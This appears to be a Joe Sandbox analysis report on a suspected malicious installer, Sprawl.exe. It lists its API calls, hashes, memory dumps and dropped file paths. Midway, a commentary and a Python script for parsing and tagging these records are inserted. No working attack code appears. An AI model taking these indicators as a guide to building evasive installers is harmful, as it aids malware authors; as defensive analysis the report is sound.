• API ID: CharNext$AttributesFilelstrcpynlstrlen
• String ID: C:\Users\user\AppData\Local\Temp\
• API String ID: 3248276644-3936084776
• Opcode ID: db8bdf16e861f9482455b6e3180b19c0ec0d0437e7b2793ecf43ff70ccde9147
• Instruction ID: 9b9a112432e638448ae222c580828ae1e9a3246b43ea9c19d715dfb55d3aa95b
• Opcode Fuzzy Hash: db8bdf16e861f9482455b6e3180b19c0ec0d0437e7b2793ecf43ff70ccde9147
• Instruction Fuzzy Hash: 1CF0F427105D6156E622323A5C49A9F1A54CE86324718C53BFC50B22C2CA3C88639D7E
APIs
• IsWindowVisible.USER32(?), ref: 00404EEB
• CallWindowProcA.USER32(?,?,?,?), ref: 00404F3C
  • Part of subcall function 00403F60: SendMessageA.USER32(00020410,00000000,00000000,00000000), ref: 00403F72
Strings
Memory Dump Source
• Source File: 00000000.00000002.2179993497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2179976731.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2180046527.0000000000407000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2180069644.0000000000409000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2180069644.000000000042B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2180069644.000000000042F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2180069644.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2180069644.0000000000440000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2180304293.0000000000442000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2180304293.0000000000446000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2180304293.0000000000452000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Sprawl.jbxd
Similarity
• API ID: Window$CallMessageProcSendVisible
• String ID:
• API String ID: 3748168415-3916222277
• Opcode ID: 44c7124f25b7d0e2ad082f453cfb3c7493e33a8b49738481f167c29b071f4aa1
• Instruction ID: 2a78fc1f4cbdadc5126368fc20cebde0bfb6f5e986cb98bc8d814c8ad8ef1b08
• Opcode Fuzzy Hash: 44c7124f25b7d0e2ad082f453cfb3c7493e33a8b49738481f167c29b071f4aa1
• Instruction Fuzzy Hash: 6D01F7B150420AAFEF20AF51DE80A5B3766E7C4751F284037FB00762D0C3799C51966D
APIs
• CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,0042B070,Error launching installer), ref: 004054E9
• CloseHandle.KERNEL32(?), ref: 004054F6
Strings
• Error launching installer, xrefs: 004054D3
Memory Dump Source
• Source File: 00000000.00000002.2179993497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2179976731.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2180046527.0000000000407000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2180069644.0000000000409000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2180069644.000000000042B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2180069644.000000000042F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2180069644.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2180069644.0000000000440000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2180304293.0000000000442000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2180304293.0000000000446000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2180304293.0000000000452000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Sprawl.jbxd
Similarity
• API ID: CloseCreateHandleProcess
• String ID: Error launching installer
• API String ID: 3712363035-66219284
• Opcode ID: 47fe2490e17a7e9d962cab7a6b56508ed3a0dd8216b7049c1380fae9186fb834
• Instruction ID: eccce0787fa873eefbebbfab998d1c477025fc2f998d9ab7e00b955d4b23de72
• Opcode Fuzzy Hash: 47fe2490e17a7e9d962cab7a6b56508ed3a0dd8216b7049c1380fae9186fb834
• Instruction Fuzzy Hash: 99E0BFB4A00209BFEB119B64ED05F7B7BACE700704F408561BD11F2190E774A8559A79
APIs
  • Part of subcall function 00404F48: lstrlenA.KERNEL32(00429048,00000000,0041C205,762323A0,?,?,?,?,?,?,?,?,?,00402FFA,00000000,?), ref: 00404F81
  • Part of subcall function 00404F48: lstrlenA.KERNEL32(00402FFA,00429048,00000000,0041C205,762323A0,?,?,?,?,?,?,?,?,?,00402FFA,00000000), ref: 00404F91
  • Part of subcall function 00404F48: lstrcatA.KERNEL32(00429048,00402FFA,00402FFA,00429048,00000000,0041C205,762323A0), ref: 00404FA4
  • Part of subcall function 00404F48: SetWindowTextA.USER32(00429048,00429048), ref: 00404FB6
  • Part of subcall function 00404F48: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404FDC
  • Part of subcall function 00404F48: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404FF6
  • Part of subcall function 00404F48: SendMessageA.USER32(?,00001013,?,00000000), ref: 00405004
  • Part of subcall function 004054C0: CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,0042B070,Error launching installer), ref: 004054E9
  • Part of subcall function 004054C0: CloseHandle.KERNEL32(?), ref: 004054F6
• WaitForSingleObject.KERNEL32(?,00000064,00000000,000000EB,00000000), ref: 00401E7E
• GetExitCodeProcess.KERNEL32(?,?), ref: 00401E8E
• CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00401EB3
Memory Dump Source
• Source File: 00000000.00000002.2179993497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2179976731.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2180046527.0000000000407000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2180069644.0000000000409000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2180069644.000000000042B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2180069644.000000000042F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2180069644.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2180069644.0000000000440000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2180304293.0000000000442000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2180304293.0000000000446000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2180304293.0000000000452000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Sprawl.jbxd
Similarity
• API ID: MessageSend$CloseHandleProcesslstrlen$CodeCreateExitObjectSingleTextWaitWindowlstrcat
• String ID:
• API String ID: 3521207402-0
• Opcode ID: fa6371b051929d11490b6b0237e04c3ddcee680ab82e9b2704d90c07df1b053f
• Instruction ID: 17c2ba3ee0df36fac51d80065c7f5b12f0089491b6a7036ff5f4409f8054ee18
• Opcode Fuzzy Hash: fa6371b051929d11490b6b0237e04c3ddcee680ab82e9b2704d90c07df1b053f
• Instruction Fuzzy Hash: 3A014031904114EBEF11AFA1CD8999F7B76EF00358F10817BF601B62E1C7795A419B9A
APIs
  • Part of subcall function 00402B44: RegOpenKeyExA.KERNELBASE(00000000,?,00000000,00000022,00000000,?,?), ref: 00402B6C
• RegQueryValueExA.ADVAPI32(00000000,00000000,?,?,?,?), ref: 00402440
• RegCloseKey.ADVAPI32(?,?,?,Arabisation\argumenta\dekaderne,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024D8
Memory Dump Source
• Source File: 00000000.00000002.2179993497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2179976731.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2180046527.0000000000407000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2180069644.0000000000409000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2180069644.000000000042B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2180069644.000000000042F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2180069644.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2180069644.0000000000440000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2180304293.0000000000442000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2180304293.0000000000446000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2180304293.0000000000452000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Sprawl.jbxd
Similarity
• API ID: CloseOpenQueryValue
• String ID:
• API String ID: 3677997916-0
APIs
• MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
• SendMessageA.USER32(?,00000402,00000000), ref: 004013F4
Memory Dump Source
• Source File: 00000000.00000002.2179993497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: MessageSend
• String ID:
• API String ID: 3850602802-0
APIs
  • Part of subcall function 00402B44: RegOpenKeyExA.KERNELBASE(00000000,?,00000000,00000022,00000000,?,?), ref: 00402B6C
• RegDeleteValueA.ADVAPI32(00000000,00000000,00000033), ref: 00402327
• RegCloseKey.ADVAPI32(00000000), ref: 00402330
Memory Dump Source
• Source File: 00000000.00000002.2179993497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: CloseDeleteOpenValue
• String ID:
• API String ID: 849931509-0
APIs
• ExpandEnvironmentStringsA.KERNELBASE(00000000,?,00000400,00000001), ref: 00401A16
• lstrcmpA.KERNEL32(?,?,?,00000400,00000001), ref: 00401A29
Memory Dump Source
• Source File: 00000000.00000002.2179993497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: EnvironmentExpandStringslstrcmp
• String ID:
• API String ID: 1938659011-0
APIs
• GetModuleHandleA.KERNEL32(?,?,?,00403179,00000009), ref: 004060DA
• GetProcAddress.KERNEL32(00000000,?), ref: 004060F5
  • Part of subcall function 0040605A: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00406071
  • Part of subcall function 0040605A: wsprintfA.USER32 ref: 004060AA
  • Part of subcall function 0040605A: LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 004060BE
Memory Dump Source
• Source File: 00000000.00000002.2179993497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
• String ID:
• API String ID: 2547128583-0
APIs
• GetFileAttributesA.KERNELBASE(00000003,00402CA6,C:\Users\user\Desktop\Sprawl.exe,80000000,00000003), ref: 004059A6
• CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 004059C8
Memory Dump Source
• Source File: 00000000.00000002.2179993497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: File$AttributesCreate
• String ID:
• API String ID: 415043291-0
APIs
• GetFileAttributesA.KERNELBASE(?,?,00405595,?,?,00000000,00405778,?,?,?,?), ref: 00405982
• SetFileAttributesA.KERNEL32(?,00000000), ref: 00405996
Memory Dump Source
• Source File: 00000000.00000002.2179993497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: AttributesFile
• String ID:
• API String ID: 3188754299-0
                                                                                                                            APIs
                                                                                                                            • CreateDirectoryA.KERNELBASE(?,00000000,00403102,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004032FF), ref: 00405491
                                                                                                                            • GetLastError.KERNEL32 ref: 0040549F
                                                                                                                            Similarity
                                                                                                                            • API ID: CreateDirectoryErrorLast
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1375471231-0
                                                                                                                            APIs
                                                                                                                            • RegOpenKeyExA.KERNELBASE(00000000,?,00000000,00000022,00000000,?,?), ref: 00402B6C
                                                                                                                            Similarity
                                                                                                                            • API ID: Open
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 71445658-0
                                                                                                                            APIs
                                                                                                                            • WriteFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,0040307A,00000000,00414420,000000FF,00414420,000000FF,000000FF,00000004,00000000), ref: 00405A5D
                                                                                                                            Similarity
                                                                                                                            • API ID: FileWrite
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3934441357-0
                                                                                                                            APIs
                                                                                                                            • ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,004030C4,00000000,00000000,00402EEE,000000FF,00000004,00000000,00000000,00000000), ref: 00405A2E
                                                                                                                            Similarity
                                                                                                                            • API ID: FileRead
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2738559852-0
                                                                                                                            APIs
                                                                                                                            • SetFileAttributesA.KERNELBASE(00000000,?,000000F0), ref: 004015A0
                                                                                                                            Similarity
                                                                                                                            • API ID: AttributesFile
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3188754299-0
                                                                                                                            APIs
                                                                                                                            • SendMessageA.USER32(00020410,00000000,00000000,00000000), ref: 00403F72
                                                                                                                            Similarity
                                                                                                                            • API ID: MessageSend
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3850602802-0
                                                                                                                            APIs
                                                                                                                            • SendMessageA.USER32(00000028,?,00000001,00403D7A), ref: 00403F57
                                                                                                                            Similarity
                                                                                                                            • API ID: MessageSend
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3850602802-0
                                                                                                                            • Opcode ID: d71ad897c2f2d45ed447b95b395c8a164bb0c93204989444b513c5694a0ce339
                                                                                                                            • Instruction ID: 9ba269cb94747afcd00db45940492297b6475019a1e9eeef8f710f25602b24aa
                                                                                                                            • Opcode Fuzzy Hash: d71ad897c2f2d45ed447b95b395c8a164bb0c93204989444b513c5694a0ce339
                                                                                                                            • Instruction Fuzzy Hash: 71B01235684200BBFE325B00DE0DF457E62F768701F008034B300250F1C7B200A2DB29
                                                                                                                            APIs
                                                                                                                            • GetDlgItemTextA.USER32(?,?,00000400,0040450E), ref: 0040551C
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2179993497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2179976731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180046527.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180069644.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180069644.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180069644.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180069644.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180069644.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180304293.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180304293.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180304293.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_Sprawl.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ItemText
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3367045223-0
                                                                                                                            • Opcode ID: 318c761e7d03a4792b39f91a0403b49a68554c31ad0ac7f657822979c07e75a0
                                                                                                                            • Instruction ID: 5bc079f376c4397dc27e91e65bfdd94062f5f07280b0cdba8df2e4a8c8164f3b
                                                                                                                            • Opcode Fuzzy Hash: 318c761e7d03a4792b39f91a0403b49a68554c31ad0ac7f657822979c07e75a0
                                                                                                                            • Instruction Fuzzy Hash: 13B0927A908200BFCE025B40DD04E0ABF62BB98711F21C424F395640B086726022EB0A
                                                                                                                            APIs
                                                                                                                            • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402E2D,?), ref: 004030D5
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2179993497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2179976731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180046527.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180069644.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180069644.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180069644.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180069644.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180069644.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180304293.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180304293.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180304293.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_Sprawl.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: FilePointer
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 973152223-0
                                                                                                                            • Opcode ID: 0070af3e33726fe8c9f5218e9eb5d27e4edbe1e9193197dd8736a9b9f47decae
                                                                                                                            • Instruction ID: 49fdcfdf8b1973cd13611e97ba0bfafd8618b6cb304eeeee9131019f9f046fb0
                                                                                                                            • Opcode Fuzzy Hash: 0070af3e33726fe8c9f5218e9eb5d27e4edbe1e9193197dd8736a9b9f47decae
                                                                                                                            • Instruction Fuzzy Hash: 03B01271644200BFDA214F00DF05F057B21A790700F10C030B748380F082712420EB4D
                                                                                                                            APIs
                                                                                                                            • GetDlgItem.USER32(?,00000403), ref: 004050E5
                                                                                                                            • GetDlgItem.USER32(?,000003EE), ref: 004050F4
                                                                                                                            • GetClientRect.USER32(?,?), ref: 00405131
                                                                                                                            • GetSystemMetrics.USER32(00000002), ref: 00405138
                                                                                                                            • SendMessageA.USER32(?,0000101B,00000000,?), ref: 00405159
                                                                                                                            • SendMessageA.USER32(?,00001036,00004000,00004000), ref: 0040516A
                                                                                                                            • SendMessageA.USER32(?,00001001,00000000,?), ref: 0040517D
                                                                                                                            • SendMessageA.USER32(?,00001026,00000000,?), ref: 0040518B
                                                                                                                            • SendMessageA.USER32(?,00001024,00000000,?), ref: 0040519E
                                                                                                                            • ShowWindow.USER32(00000000,?,0000001B,?), ref: 004051C0
                                                                                                                            • ShowWindow.USER32(?,00000008), ref: 004051D4
                                                                                                                            • GetDlgItem.USER32(?,000003EC), ref: 004051F5
                                                                                                                            • SendMessageA.USER32(00000000,00000401,00000000,75300000), ref: 00405205
                                                                                                                            • SendMessageA.USER32(00000000,00000409,00000000,?), ref: 0040521E
                                                                                                                            • SendMessageA.USER32(00000000,00002001,00000000,?), ref: 0040522A
                                                                                                                            • GetDlgItem.USER32(?,000003F8), ref: 00405103
                                                                                                                              • Part of subcall function 00403F49: SendMessageA.USER32(00000028,?,00000001,00403D7A), ref: 00403F57
                                                                                                                            • GetDlgItem.USER32(?,000003EC), ref: 00405246
                                                                                                                            • CreateThread.KERNEL32(00000000,00000000,Function_0000501A,00000000), ref: 00405254
                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 0040525B
                                                                                                                            • ShowWindow.USER32(00000000), ref: 0040527E
                                                                                                                            • ShowWindow.USER32(?,00000008), ref: 00405285
                                                                                                                            • ShowWindow.USER32(00000008), ref: 004052CB
                                                                                                                            • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 004052FF
                                                                                                                            • CreatePopupMenu.USER32 ref: 00405310
                                                                                                                            • AppendMenuA.USER32(00000000,00000000,00000001,00000000), ref: 00405325
                                                                                                                            • GetWindowRect.USER32(?,000000FF), ref: 00405345
                                                                                                                            • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 0040535E
                                                                                                                            • SendMessageA.USER32(?,0000102D,00000000,?), ref: 0040539A
                                                                                                                            • OpenClipboard.USER32(00000000), ref: 004053AA
                                                                                                                            • EmptyClipboard.USER32 ref: 004053B0
                                                                                                                            • GlobalAlloc.KERNEL32(00000042,?), ref: 004053B9
                                                                                                                            • GlobalLock.KERNEL32(00000000), ref: 004053C3
                                                                                                                            • SendMessageA.USER32(?,0000102D,00000000,?), ref: 004053D7
                                                                                                                            • GlobalUnlock.KERNEL32(00000000), ref: 004053F0
                                                                                                                            • SetClipboardData.USER32(00000001,00000000), ref: 004053FB
                                                                                                                            • CloseClipboard.USER32 ref: 00405401
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2179993497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2179976731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180046527.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180069644.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180069644.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180069644.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180069644.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180069644.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180304293.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180304293.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180304293.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_Sprawl.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 590372296-0
                                                                                                                            • Opcode ID: 3d83c7054a3b30a9ea95d535bbc07a084d735a6ee6b89b99bed3655396955496
                                                                                                                            • Instruction ID: a6ce54ef4cbaee69b9623da841507b5c48c0df4ae21fd636639bbbe11a9743ae
                                                                                                                            • Opcode Fuzzy Hash: 3d83c7054a3b30a9ea95d535bbc07a084d735a6ee6b89b99bed3655396955496
                                                                                                                            • Instruction Fuzzy Hash: 8EA13871900208BFEB119FA0DD89AAE7F79FB08355F10407AFA01BA1A0C7755E51DF69
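The record above is worth reading as a sequence rather than as a bag of API names: OpenClipboard, EmptyClipboard, GlobalAlloc(0x42), GlobalLock, SendMessageA(…,0x102D,…), GlobalUnlock, SetClipboardData(1, …), CloseClipboard is a clipboard write of list-view item text (0x102D is LVM_GETITEMTEXTA and format 1 is CF_TEXT), not a clipboard read; GetClipboardData never appears. The helper below is an added example written for this page (it is not Joe Sandbox code and not code from the sample): it parses these per-function "APIs" records, decodes the raw constants the report prints, and tags each function by what its call sequence actually does. The constant tables are Windows SDK values assumed from the headers, and SAMPLE is constructed from the lines of the records on this page.

```python
"""Triage helper for the per-function API records in this report.

Added example, not Joe Sandbox code and not the sample's code. It groups
the "APIs" lines of each record, decodes the raw constants the report
shows, and tags a record whose calls form a clipboard write or create a
thread. SAMPLE is constructed from the records on this page.
"""
from __future__ import annotations

import re
from dataclasses import dataclass, field

API_RE = re.compile(
    r"^•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]{8}):\s*)?"
    r"(?P<name>\w+)\.(?P<module>[A-Za-z0-9]+)"
    r"(?:\((?P<args>[^)]*)\))?\s*,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})\s*$"
)
FUZZY_RE = re.compile(r"^•\s*Instruction Fuzzy Hash:\s*(?P<hash>[0-9A-Fa-f]+)\s*$")

# Windows SDK values (assumed from the headers; the report prints only hex).
CLIPBOARD_FORMATS = {0x1: "CF_TEXT", 0xD: "CF_UNICODETEXT"}
GMEM_FLAGS = {0x02: "GMEM_MOVEABLE", 0x40: "GMEM_ZEROINIT"}
LISTVIEW_MSGS = {0x1004: "LVM_GETITEMCOUNT", 0x102D: "LVM_GETITEMTEXTA"}


@dataclass
class ApiCall:
    name: str
    module: str
    args: list[str]
    ref: int                       # call-site address from "ref:"
    subcall_of: int | None = None  # set for "Part of subcall function" lines

    def decode(self) -> str:
        """Symbolic name of the argument that matters for triage, if known."""
        try:
            if self.name == "SetClipboardData":
                return CLIPBOARD_FORMATS.get(int(self.args[0], 16), "?")
            if self.name == "GlobalAlloc":
                v = int(self.args[0], 16)
                return "|".join(n for b, n in GMEM_FLAGS.items() if v & b) or hex(v)
            if self.name.startswith("SendMessage") and len(self.args) > 1:
                return LISTVIEW_MSGS.get(int(self.args[1], 16), "?")
        except (ValueError, IndexError):  # argument shown as '?' or absent
            pass
        return ""


@dataclass
class FunctionRecord:
    apis: list[ApiCall] = field(default_factory=list)
    fuzzy_hash: str = ""

    def names(self) -> list[str]:
        """Calls made directly by this function, in listing order."""
        return [a.name for a in self.apis if a.subcall_of is None]

    def tags(self) -> set[str]:
        n = self.names()
        tags: set[str] = set()
        # Open -> Set -> Close in that order is a write, whatever sits between.
        clip = [x for x in n if x in ("OpenClipboard", "SetClipboardData", "CloseClipboard")]
        if clip == ["OpenClipboard", "SetClipboardData", "CloseClipboard"]:
            tags.add("clipboard-write")
        if "GetClipboardData" in n:
            tags.add("clipboard-read")
        if any(x in n for x in ("CreateThread", "CreateRemoteThread")):
            tags.add("creates-thread")
        return tags


def parse_records(text: str) -> list[FunctionRecord]:
    """Split the listing at each "APIs" header and collect its call lines."""
    records: list[FunctionRecord] = []
    cur: FunctionRecord | None = None
    for raw in text.splitlines():
        line = raw.strip()
        if line == "APIs":
            cur = FunctionRecord()
            records.append(cur)
            continue
        if cur is None:
            continue
        m = API_RE.match(line)
        if m:
            args = [a.strip() for a in (m["args"] or "").split(",") if a.strip()]
            sub = int(m["sub"], 16) if m["sub"] else None
            cur.apis.append(ApiCall(m["name"], m["module"], args, int(m["ref"], 16), sub))
            continue
        f = FUZZY_RE.match(line)
        if f:
            cur.fuzzy_hash = f["hash"]
    return records


# Constructed from two records on this page (trimmed to the relevant calls).
SAMPLE = """\
APIs
• GetDlgItem.USER32(?,00000403), ref: 004050E5
  • Part of subcall function 00403F49: SendMessageA.USER32(00000028,?,00000001,00403D7A), ref: 00403F57
• CreateThread.KERNEL32(00000000,00000000,Function_0000501A,00000000), ref: 00405254
• OpenClipboard.USER32(00000000), ref: 004053AA
• EmptyClipboard.USER32 ref: 004053B0
• GlobalAlloc.KERNEL32(00000042,?), ref: 004053B9
• GlobalLock.KERNEL32(00000000), ref: 004053C3
• SendMessageA.USER32(?,0000102D,00000000,?), ref: 004053D7
• GlobalUnlock.KERNEL32(00000000), ref: 004053F0
• SetClipboardData.USER32(00000001,00000000), ref: 004053FB
• CloseClipboard.USER32 ref: 00405401
• Instruction Fuzzy Hash: 8EA13871900208BFEB119FA0DD89AAE7F79FB08355F10407AFA01BA1A0C7755E51DF69
APIs
• FindFirstFileA.KERNEL32(00000000,?,00000002), ref: 00402697
"""
```

Feed the whole listing to parse_records and sort by tags to find the functions that touch the clipboard or spawn threads; the "Part of subcall function" lines are kept on the record but excluded from names(), so a tag reflects what the function itself calls rather than what its callees do.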
APIs
• CoCreateInstance.OLE32(00407514,?,00000001,00407504,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 004020DD
• MultiByteToWideChar.KERNEL32(?,?,?,000000FF,?,00000400,?,00000001,00407504,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402189
Strings
• C:\Users\user\AppData\Roaming\underarmsmusklens\Edriophthalmian, xrefs: 0040211D
Memory Dump Source
